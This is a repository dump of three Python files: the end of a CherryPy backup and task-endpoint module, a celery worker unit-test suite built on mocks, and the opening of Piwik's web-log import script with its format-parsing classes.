except Exception as e:
logging.error('Unable to create backup.', exc_info=True)
return {'response': False, 'error': str(e)}
return {'response': True, 'message': _('Backup created as {}').format(os.path.join(core.PROG_PATH, 'watcher.zip'))}
@cherrypy.expose
@cherrypy.tools.json_out()
def restore_backup(self, fileUpload):
logging.info('Restoring backup from uploaded zip.')
n = datetime.datetime.today().microsecond
tmp_zip = os.path.join(core.PROG_PATH, 'restore_{}.zip'.format(n))
try:
with open(tmp_zip, 'wb') as f:
f.seek(0)
f.write(fileUpload.file.read())
logging.info('Restore zip temporarily stored as {}.'.format(tmp_zip))
backup.restore(require_confirm=False, file=tmp_zip)
logging.info('Removing temporary zip {}'.format(tmp_zip))
os.unlink(tmp_zip)
except Exception as e:
logging.error('Unable to restore backup.', exc_info=True)
return {'response': False}
threading.Timer(3, core.restart).start()
return {'response': True}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_task_execute(self, name):
''' Calls task's now() function to execute task now
name (str): name of scheduled task to run
Response includes core.NOTIFICATIONS so the browser can display any
notifications generated during the task.
Returns dict ajax-style response
'''
try:
logging.info('Manually executing task {}.'.format(name))
task = core.scheduler_plugin.task_list[name]
task.now()
le = task.last_execution
return {'response': True, 'message': _('Finished task {}.').format(name), 'last_execution': le, 'notifications': core.NOTIFICATIONS}
except Exception as e:
return {'response': False, 'error': str(e)}
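# Consumption sketch (hypothetical client code, not part of this module):
# endpoints configured with {'response.stream': True, 'tools.gzip.on': False}
# yield one JSON document per progress step, so a client can render progress
# incrementally instead of waiting for the full response body:
#
#   import json
#   import requests  # hypothetical dependency
#
#   with requests.post(base_url + '/ajax/import_dir', data=payload,
#                      stream=True) as r:
#       for chunk in r.iter_content(chunk_size=None):
#           print(json.loads(chunk))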
|
__init__.py
|
from __future__ import absolute_import
from __future__ import with_statement
import socket
import sys
from collections import deque
from datetime import datetime, timedelta
from Queue import Empty
from kombu.transport.base import Message
from kombu.connection import BrokerConnection
from mock import Mock, patch
from nose import SkipTest
from celery import current_app
from celery.app.defaults import DEFAULTS
from celery.concurrency.base import BasePool
from celery.datastructures import AttributeDict
from celery.exceptions import SystemTerminate
from celery.task import task as task_dec
from celery.task import periodic_task as periodic_task_dec
from celery.utils import uuid
from celery.worker import WorkController
from celery.worker.buckets import FastQueue
from celery.worker.job import Request
from celery.worker.consumer import Consumer as MainConsumer
from celery.worker.consumer import QoS, RUN, PREFETCH_COUNT_MAX, CLOSE
from celery.utils.serialization import pickle
from celery.utils.timer2 import Timer
from celery.tests.utils import AppCase, Case
class PlaceHolder(object):
pass
class MyKombuConsumer(MainConsumer):
broadcast_consumer = Mock()
task_consumer = Mock()
def __init__(self, *args, **kwargs):
kwargs.setdefault("pool", BasePool(2))
super(MyKombuConsumer, self).__init__(*args, **kwargs)
def restart_heartbeat(self):
self.heart = None
class MockNode(object):
commands = []
def handle_message(self, body, message):
self.commands.append(body.pop("command", None))
class MockEventDispatcher(object):
sent = []
closed = False
flushed = False
_outbound_buffer = []
def send(self, event, *args, **kwargs):
self.sent.append(event)
def close(self):
self.closed = True
def flush(self):
self.flushed = True
class MockHeart(object):
closed = False
def stop(self):
self.closed = True
@task_dec()
def foo_task(x, y, z, **kwargs):
return x * y * z
@periodic_task_dec(run_every=60)
def foo_periodic_task():
return "foo"
def create_message(channel, **data):
data.setdefault("id", uuid())
channel.no_ack_consumers = set()
return Message(channel, body=pickle.dumps(dict(**data)),
content_type="application/x-python-serialize",
content_encoding="binary",
delivery_info={"consumer_tag": "mock"})
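# Typical use in the tests below:
#   m = create_message(Mock(), task=foo_task.name, args=[2, 4, 8], kwargs={})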
class test_QoS(Case):
class _QoS(QoS):
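        # Minimal QoS stub: set() is overridden to a no-op so the prefetch
        # bookkeeping can be exercised without a real channel behind it.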
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value, None)
def set(self, value):
return value
def test_qos_increment_decrement(self):
qos = self._QoS(10)
self.assertEqual(qos.increment(), 11)
self.assertEqual(qos.increment(3), 14)
self.assertEqual(qos.increment(-30), 14)
self.assertEqual(qos.decrement(7), 7)
self.assertEqual(qos.decrement(), 6)
with self.assertRaises(AssertionError):
qos.decrement(10)
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
self.assertEqual(qos.increment(), 0)
self.assertEqual(qos.increment(3), 0)
self.assertEqual(qos.increment(-30), 0)
self.assertEqual(qos.decrement(7), 0)
self.assertEqual(qos.decrement(), 0)
self.assertEqual(qos.decrement(10), 0)
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in xrange(1000):
qos.increment()
def sub():
for i in xrange(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
self.assertEqual(qos.value, 2010)
qos.value = 1000
threaded([add, sub]) # n = 2
self.assertEqual(qos.value, 1000)
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1,
current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX + 1)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
def test_consumer_increment_decrement(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, 10)
self.assertIn({"prefetch_count": 10}, consumer.qos.call_args)
qos.decrement()
self.assertEqual(qos.value, 9)
self.assertIn({"prefetch_count": 9}, consumer.qos.call_args)
qos.decrement_eventually()
self.assertEqual(qos.value, 8)
self.assertIn({"prefetch_count": 9}, consumer.qos.call_args)
        # A disabled (0) value is never incremented or decremented
qos.value = 0
qos.decrement()
self.assertEqual(qos.value, 0)
qos.increment()
self.assertEqual(qos.value, 0)
def test_consumer_decrement_eventually(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.decrement_eventually()
self.assertEqual(qos.value, 9)
qos.value = 0
qos.decrement_eventually()
self.assertEqual(qos.value, 0)
def test_set(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.set(12)
self.assertEqual(qos.prev, 12)
qos.set(qos.prev)
class test_Consumer(Case):
def setUp(self):
self.ready_queue = FastQueue()
self.eta_schedule = Timer()
self.logger = current_app.log.get_default_logger()
self.logger.setLevel(0)
def tearDown(self):
self.eta_schedule.stop()
def test_info(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(l.task_consumer, 10, l.logger)
info = l.info
self.assertEqual(info["prefetch_count"], 10)
self.assertFalse(info["broker"])
l.connection = current_app.broker_connection()
info = l.info
self.assertTrue(info["broker"])
def test_start_when_closed(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = CLOSE
l.start()
def test_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l._state = RUN
l.event_dispatcher = None
l.stop_consumers(close_connection=False)
self.assertTrue(l.connection)
l._state = RUN
l.stop_consumers()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l.stop_consumers()
l.stop()
l.close_connection()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
def test_close_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
l.close_connection()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
eventer = l.event_dispatcher = Mock()
eventer.enabled = True
heart = l.heart = MockHeart()
l._state = RUN
l.stop_consumers()
self.assertTrue(eventer.close.call_count)
self.assertTrue(heart.closed)
def test_receive_message_unknown(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, unknown={"baz": "!!!"})
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
with self.assertWarnsRegex(RuntimeWarning, r'unknown message'):
l.receive_message(m.decode(), m)
@patch("celery.utils.timer2.to_timestamp")
def test_receive_message_eta_OverflowError(self, to_timestamp):
to_timestamp.side_effect = OverflowError()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=("2, 2"),
kwargs={},
eta=datetime.now().isoformat())
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
l.update_strategies()
l.receive_message(m.decode(), m)
self.assertTrue(m.acknowledged)
self.assertTrue(to_timestamp.call_count)
def test_receive_message_InvalidTaskError(self):
logger = Mock()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=(1, 2), kwargs="foobarbaz", id=1)
l.update_strategies()
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
l.receive_message(m.decode(), m)
self.assertIn("Received invalid task message",
logger.error.call_args[0][0])
def test_on_decode_error(self):
logger = Mock()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
class MockMessage(Mock):
content_type = "application/x-msgpack"
content_encoding = "binary"
body = "foobarbaz"
message = MockMessage()
l.on_decode_error(message, KeyError("foo"))
self.assertTrue(message.ack.call_count)
self.assertIn("Can't decode message body",
logger.critical.call_args[0][0])
    def test_receive_message(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=[2, 4, 8], kwargs={})
l.update_strategies()
l.event_dispatcher = Mock()
l.receive_message(m.decode(), m)
in_bucket = self.ready_queue.get_nowait()
self.assertIsInstance(in_bucket, Request)
self.assertEqual(in_bucket.task_name, foo_task.name)
self.assertEqual(in_bucket.execute(), 2 * 4 * 8)
self.assertTrue(self.eta_schedule.empty())
def test_start_connection_error(self):
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.connection_errors = (KeyError, )
with self.assertRaises(SyntaxError):
l.start()
l.heart.stop()
l.priority_timer.stop()
def test_start_channel_error(self):
# Regression test for AMQPChannelExceptions that can occur within the
        # consumer (e.g. 404 errors).
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.channel_errors = (KeyError, )
self.assertRaises(SyntaxError, l.start)
l.heart.stop()
l.priority_timer.stop()
def test_consume_messages_ignores_socket_timeout(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
raise socket.timeout(10)
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.task_consumer = Mock()
l.connection.obj = l
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
def test_consume_messages_when_socket_error(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
raise socket.error("foo")
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
c = l.connection = Connection()
l.connection.obj = l
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, 10, l.logger)
with self.assertRaises(socket.error):
l.consume_messages()
l._state = CLOSE
l.connection = c
l.consume_messages()
def test_consume_messages(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.connection.obj = l
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
l.consume_messages()
self.assertTrue(l.task_consumer.consume.call_count)
l.task_consumer.qos.assert_called_with(prefetch_count=10)
l.qos.decrement()
l.consume_messages()
l.task_consumer.qos.assert_called_with(prefetch_count=9)
def test_maybe_conn_error(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection_errors = (KeyError, )
l.channel_errors = (SyntaxError, )
l.maybe_conn_error(Mock(side_effect=AttributeError("foo")))
l.maybe_conn_error(Mock(side_effect=KeyError("foo")))
l.maybe_conn_error(Mock(side_effect=SyntaxError("foo")))
with self.assertRaises(IndexError):
l.maybe_conn_error(Mock(side_effect=IndexError("foo")))
def test_apply_eta_task(self):
from celery.worker import state
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(None, 10, l.logger)
task = object()
qos = l.qos.value
l.apply_eta_task(task)
self.assertIn(task, state.reserved_requests)
self.assertEqual(l.qos.value, qos - 1)
self.assertIs(self.ready_queue.get_nowait(), task)
    def test_receive_message_eta_isoformat(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
eta=datetime.now().isoformat(),
args=[2, 4, 8], kwargs={})
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, l.initial_prefetch_count, l.logger)
l.event_dispatcher = Mock()
l.enabled = False
l.update_strategies()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
items = [entry[2] for entry in self.eta_schedule.queue]
        found = False
for item in items:
if item.args[0].name == foo_task.name:
found = True
self.assertTrue(found)
self.assertTrue(l.task_consumer.qos.call_count)
l.eta_schedule.stop()
def test_on_control(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
l.reset_pidbox_node = Mock()
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.pidbox_node = Mock()
l.pidbox_node.handle_message.side_effect = KeyError("foo")
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.pidbox_node = Mock()
l.pidbox_node.handle_message.side_effect = ValueError("foo")
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.reset_pidbox_node.assert_called_with()
def test_revoke(self):
ready_queue = FastQueue()
l = MyKombuConsumer(ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
id = uuid()
t = create_message(backend, task=foo_task.name, args=[2, 4, 8],
kwargs={}, id=id)
from celery.worker.state import revoked
revoked.add(id)
l.receive_message(t.decode(), t)
self.assertTrue(ready_queue.empty())
    def test_receive_message_not_registered(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, task="x.X.31x", args=[2, 4, 8], kwargs={})
l.event_dispatcher = Mock()
self.assertFalse(l.receive_message(m.decode(), m))
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
self.assertTrue(self.eta_schedule.empty())
    def test_receive_message_ack_raises(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, args=[2, 4, 8], kwargs={})
l.event_dispatcher = Mock()
l.connection_errors = (socket.error, )
l.logger = Mock()
m.reject = Mock()
m.reject.side_effect = socket.error("foo")
with self.assertWarnsRegex(RuntimeWarning, r'unknown message'):
self.assertFalse(l.receive_message(m.decode(), m))
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
self.assertTrue(self.eta_schedule.empty())
m.reject.assert_called_with()
self.assertTrue(l.logger.critical.call_count)
    def test_receive_message_eta(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.event_dispatcher = Mock()
l.event_dispatcher._outbound_buffer = deque()
backend = Mock()
m = create_message(backend, task=foo_task.name,
args=[2, 4, 8], kwargs={},
eta=(datetime.now() +
timedelta(days=1)).isoformat())
l.reset_connection()
p = l.app.conf.BROKER_CONNECTION_RETRY
l.app.conf.BROKER_CONNECTION_RETRY = False
try:
l.reset_connection()
finally:
l.app.conf.BROKER_CONNECTION_RETRY = p
l.stop_consumers()
l.event_dispatcher = Mock()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
in_hold = self.eta_schedule.queue[0]
self.assertEqual(len(in_hold), 3)
eta, priority, entry = in_hold
task = entry.args[0]
self.assertIsInstance(task, Request)
self.assertEqual(task.task_name, foo_task.name)
self.assertEqual(task.execute(), 2 * 4 * 8)
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
def test_reset_pidbox_node(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
chan = l.pidbox_node.channel = Mock()
l.connection = Mock()
chan.close.side_effect = socket.error("foo")
l.connection_errors = (socket.error, )
l.reset_pidbox_node()
chan.close.assert_called_with()
def test_reset_pidbox_node_green(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pool = Mock()
l.pool.is_green = True
l.reset_pidbox_node()
l.pool.spawn_n.assert_called_with(l._green_pidbox_node)
def test__green_pidbox_node(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
class BConsumer(Mock):
def __enter__(self):
self.consume()
return self
def __exit__(self, *exc_info):
self.cancel()
l.pidbox_node.listen = BConsumer()
connections = []
class Connection(object):
def __init__(self, obj):
connections.append(self)
self.obj = obj
self.default_channel = self.channel()
self.closed = False
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def channel(self):
return Mock()
def drain_events(self, **kwargs):
self.obj.connection = None
self.obj._pidbox_node_shutdown.set()
def close(self):
self.closed = True
l.connection = Mock()
l._open_connection = lambda: Connection(obj=l)
l._green_pidbox_node()
l.pidbox_node.listen.assert_called_with(callback=l.on_control)
self.assertTrue(l.broadcast_consumer)
l.broadcast_consumer.consume.assert_called_with()
self.assertIsNone(l.connection)
self.assertTrue(connections[0].closed)
def test_start__consume_messages(self):
class _QoS(object):
prev = 3
value = 4
def update(self):
self.prev = self.value
class _Consumer(MyKombuConsumer):
iterations = 0
def reset_connection(self):
if self.iterations >= 1:
raise KeyError("foo")
init_callback = Mock()
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.task_consumer = Mock()
l.broadcast_consumer = Mock()
l.qos = _QoS()
l.connection = BrokerConnection()
l.iterations = 0
def raises_KeyError(limit=None):
l.iterations += 1
if l.qos.prev != l.qos.value:
l.qos.update()
if l.iterations >= 2:
raise KeyError("foo")
l.consume_messages = raises_KeyError
with self.assertRaises(KeyError):
l.start()
self.assertTrue(init_callback.call_count)
self.assertEqual(l.iterations, 1)
self.assertEqual(l.qos.prev, l.qos.value)
init_callback.reset_mock()
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.qos = _QoS()
l.task_consumer = Mock()
l.broadcast_consumer = Mock()
l.connection = BrokerConnection()
l.consume_messages = Mock(side_effect=socket.error("foo"))
with self.assertRaises(socket.error):
l.start()
self.assertTrue(init_callback.call_count)
self.assertTrue(l.consume_messages.call_count)
def test_reset_connection_with_no_node(self):
l = MainConsumer(self.ready_queue, self.eta_schedule, self.logger)
self.assertEqual(None, l.pool)
l.reset_connection()
class test_WorkController(AppCase):
def setup(self):
self.worker = self.create_worker()
def create_worker(self, **kw):
worker = WorkController(concurrency=1, loglevel=0, **kw)
worker._shutdown_complete.set()
worker.logger = Mock()
return worker
@patch("celery.platforms.signals")
@patch("celery.platforms.set_mp_process_title")
def test_process_initializer(self, set_mp_process_title, _signals):
from celery import Celery
from celery import signals
from celery.app import _tls
from celery.concurrency.processes import process_initializer
from celery.concurrency.processes import (WORKER_SIGRESET,
WORKER_SIGIGNORE)
def on_worker_process_init(**kwargs):
on_worker_process_init.called = True
on_worker_process_init.called = False
signals.worker_process_init.connect(on_worker_process_init)
loader = Mock()
app = Celery(loader=loader, set_as_current=False)
app.conf = AttributeDict(DEFAULTS)
process_initializer(app, "awesome.worker.com")
self.assertIn((tuple(WORKER_SIGIGNORE), {}),
_signals.ignore.call_args_list)
self.assertIn((tuple(WORKER_SIGRESET), {}),
_signals.reset.call_args_list)
self.assertTrue(app.loader.init_worker.call_count)
self.assertTrue(on_worker_process_init.called)
self.assertIs(_tls.current_app, app)
set_mp_process_title.assert_called_with("celeryd",
hostname="awesome.worker.com")
def test_with_rate_limits_disabled(self):
worker = WorkController(concurrency=1, loglevel=0,
disable_rate_limits=True)
self.assertTrue(hasattr(worker.ready_queue, "put"))
def test_attrs(self):
worker = self.worker
self.assertIsInstance(worker.scheduler, Timer)
self.assertTrue(worker.scheduler)
self.assertTrue(worker.pool)
self.assertTrue(worker.consumer)
self.assertTrue(worker.mediator)
self.assertTrue(worker.components)
def test_with_embedded_celerybeat(self):
worker = WorkController(concurrency=1, loglevel=0,
embed_clockservice=True)
self.assertTrue(worker.beat)
self.assertIn(worker.beat, worker.components)
def test_with_autoscaler(self):
worker = self.create_worker(autoscale=[10, 3], send_events=False,
eta_scheduler_cls="celery.utils.timer2.Timer")
self.assertTrue(worker.autoscaler)
def test_dont_stop_or_terminate(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.stop()
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate()
self.assertNotEqual(worker._state, worker.CLOSE)
sigsafe, worker.pool.signal_safe = worker.pool.signal_safe, False
try:
worker._state = worker.RUN
worker.stop(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
finally:
worker.pool.signal_safe = sigsafe
def test_on_timer_error(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.logger = Mock()
try:
raise KeyError("foo")
except KeyError:
exc_info = sys.exc_info()
worker.on_timer_error(exc_info)
msg, args = worker.logger.error.call_args[0]
self.assertIn("KeyError", msg % args)
def test_on_timer_tick(self):
worker = WorkController(concurrency=1, loglevel=10)
worker.logger = Mock()
worker.timer_debug = worker.logger.debug
worker.on_timer_tick(30.0)
xargs = worker.logger.debug.call_args[0]
fmt, arg = xargs[0], xargs[1]
self.assertEqual(30.0, arg)
self.assertIn("Next eta %s secs", fmt)
def test_process_task(self):
worker = self.worker
worker.pool = Mock()
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.process_task(task)
self.assertEqual(worker.pool.apply_async.call_count, 1)
worker.pool.stop()
def test_process_task_raise_base(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = KeyboardInterrupt("Ctrl+C")
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
with self.assertRaises(KeyboardInterrupt):
worker.process_task(task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_SystemTerminate(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = SystemTerminate()
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
with self.assertRaises(SystemExit):
worker.process_task(task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_regular(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = KeyError("some exception")
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.process_task(task)
worker.pool.stop()
def test_start_catches_base_exceptions(self):
worker1 = self.create_worker()
stc = Mock()
stc.start.side_effect = SystemTerminate()
worker1.components = [stc]
worker1.start()
self.assertTrue(stc.terminate.call_count)
worker2 = self.create_worker()
sec = Mock()
sec.start.side_effect = SystemExit()
sec.terminate = None
worker2.components = [sec]
worker2.start()
self.assertTrue(sec.stop.call_count)
def test_state_db(self):
from celery.worker import state
Persistent = state.Persistent
state.Persistent = Mock()
try:
worker = self.create_worker(state_db="statefilename")
self.assertTrue(worker._persistence)
finally:
state.Persistent = Persistent
def test_disable_rate_limits_solo(self):
worker = self.create_worker(disable_rate_limits=True,
pool_cls="solo")
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertIsNone(worker.mediator)
self.assertEqual(worker.ready_queue.put, worker.process_task)
def test_disable_rate_limits_processes(self):
try:
worker = self.create_worker(disable_rate_limits=True,
pool_cls="processes")
except ImportError:
raise SkipTest("multiprocessing not supported")
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertTrue(worker.mediator)
self.assertNotEqual(worker.ready_queue.put, worker.process_task)
def test_start__stop(self):
worker = self.worker
worker._shutdown_complete.set()
worker.components = [Mock(), Mock(), Mock(), Mock()]
worker.start()
for w in worker.components:
self.assertTrue(w.start.call_count)
worker.stop()
for component in worker.components:
            self.assertTrue(component.stop.call_count)
def test_start__terminate(self):
worker = self.worker
worker._shutdown_complete.set()
worker.components = [Mock(), Mock(), Mock(), Mock(), Mock()]
for component in worker.components[:3]:
component.terminate = None
worker.start()
for w in worker.components[:3]:
self.assertTrue(w.start.call_count)
        self.assertEqual(worker._running, len(worker.components))
self.assertEqual(worker._state, RUN)
worker.terminate()
for component in worker.components[:3]:
self.assertTrue(component.stop.call_count)
self.assertTrue(worker.components[4].terminate.call_count)
|
import_logs.py
|
#!/usr/bin/python
# vim: et sw=4 ts=4:
# -*- coding: utf-8 -*-
#
# Piwik - free/libre analytics platform
#
# @link https://piwik.org
# @license https://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later
# @version $Id$
#
# For more info see: https://piwik.org/log-analytics/ and https://piwik.org/docs/log-analytics-tool-how-to/
#
# Requires Python 2.6 or 2.7
#
import sys
if sys.version_info[0] != 2:
print('The log importer currently does not work with Python 3 (or higher)')
print('Please use Python 2.6 or 2.7')
sys.exit(1)
import base64
import bz2
import ConfigParser
import datetime
import fnmatch
import gzip
import hashlib
import httplib
import inspect
import itertools
import logging
import optparse
import os
import os.path
import Queue
import re
import ssl
import sys
import threading
import time
import urllib
import urllib2
import urlparse
import subprocess
import functools
import traceback
import socket
import textwrap
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
if sys.version_info < (2, 6):
print >> sys.stderr, 'simplejson (http://pypi.python.org/pypi/simplejson/) is required.'
sys.exit(1)
##
## Constants.
##
STATIC_EXTENSIONS = set((
'gif jpg jpeg png bmp ico svg svgz ttf otf eot woff woff2 class swf css js xml robots.txt webp'
).split())
DOWNLOAD_EXTENSIONS = set((
'7z aac arc arj asf asx avi bin csv deb dmg doc docx exe flac flv gz gzip hqx '
'ibooks jar json mpg mp2 mp3 mp4 mpeg mov movie msi msp odb odf odg odp '
'ods odt ogg ogv pdf phps ppt pptx qt qtm ra ram rar rpm rtf sea sit tar tbz '
'bz2 tbz tgz torrent txt wav webm wma wmv wpd xls xlsx xml xsd z zip '
'azw3 epub mobi apk'
).split())
# A good source is: http://phpbb-bots.blogspot.com/
# user agents must be lowercase
EXCLUDED_USER_AGENTS = (
'adsbot-google',
'ask jeeves',
'baidubot',
'bot-',
'bot/',
'ccooter/',
'crawl',
'curl',
'echoping',
'exabot',
'feed',
'googlebot',
'ia_archiver',
'java/',
'libwww',
'mediapartners-google',
'msnbot',
'netcraftsurvey',
'panopta',
'pingdom.com_bot_',
'robot',
'spider',
'surveybot',
'twiceler',
'voilabot',
'yahoo',
'yandex',
)
PIWIK_DEFAULT_MAX_ATTEMPTS = 3
PIWIK_DEFAULT_DELAY_AFTER_FAILURE = 10
DEFAULT_SOCKET_TIMEOUT = 300
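# base64 of the 1x1 GIF that the piwik.php tracker is expected to return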
PIWIK_EXPECTED_IMAGE = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='
)
##
## Formats.
##
class BaseFormatException(Exception): pass
class BaseFormat(object):
def __init__(self, name):
self.name = name
self.regex = None
self.date_format = '%d/%b/%Y:%H:%M:%S'
def check_format(self, file):
line = file.readline()
try:
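            # rewind so parsing starts from the first line again; stdin/pipes are not seekable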
file.seek(0)
except IOError:
pass
return self.check_format_line(line)
def check_format_line(self, line):
return False
class JsonFormat(BaseFormat):
def __init__(self, name):
super(JsonFormat, self).__init__(name)
self.json = None
self.date_format = '%Y-%m-%dT%H:%M:%S'
def check_format_line(self, line):
try:
self.json = json.loads(line)
return True
except:
return False
def match(self, line):
try:
            # nginx outputs malformed JSON w/ hex escapes when confronted w/ non-UTF input. We have
            # to work around this by converting hex escapes in strings to unicode escapes. The
            # conversion is naive, so it does not take into account the string's actual encoding
            # (which we don't have access to).
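            # e.g. a raw escape like \xe9 in the line becomes \u00e9, which
            # json.loads accepts (as U+00E9) instead of raising an error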
line = line.replace('\\x', '\\u00')
self.json = json.loads(line)
return self
except:
self.json = None
return None
def get(self, key):
        # Some ugly patches ...
if key == 'generation_time_milli':
self.json[key] = int(float(self.json[key]) * 1000)
# Patch date format ISO 8601
elif key == 'date':
tz = self.json[key][19:]
self.json['timezone'] = tz.replace(':', '')
self.json[key] = self.json[key][:19]
try:
return self.json[key]
except KeyError:
raise BaseFormatException()
    def get_all(self):
return self.json
def remove_ignored_groups(self, groups):
for group in groups:
del self.json[group]
class RegexFormat(BaseFormat):
def __init__(self, name, regex, date_format=None):
super(RegexFormat, self).__init__(name)
if regex is not None:
self.regex = re.compile(regex)
if date_format is not None:
self.date_format = date_format
self.matched = None
